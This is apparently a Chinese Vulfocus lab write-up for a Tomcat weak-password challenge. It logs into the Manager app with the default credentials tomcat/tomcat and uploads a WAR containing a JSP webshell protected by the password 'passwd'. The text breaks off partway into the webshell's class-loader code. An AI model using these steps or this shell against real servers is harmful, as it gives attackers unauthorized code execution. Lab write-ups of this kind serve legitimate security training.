【Vulfocus解题复现】tomcat-pass-getshell 弱口令

漏洞介绍

名称：Tomcat-pass-getshell 弱口令

描述：Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台，部署war包geshell

解题过程

1、打开靶场环境，并点击Manage App链接，通过弱口令登录平台，账号密码均为：tomcat

 2、拖动页面，找到war上传区域，上传jsp木马：

制作jsp木马，下段jsp木马密码为：passwd，将下述代码保存为jsp格式，并将jsp格式文件打包压缩成为war文件格式进行上传。

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }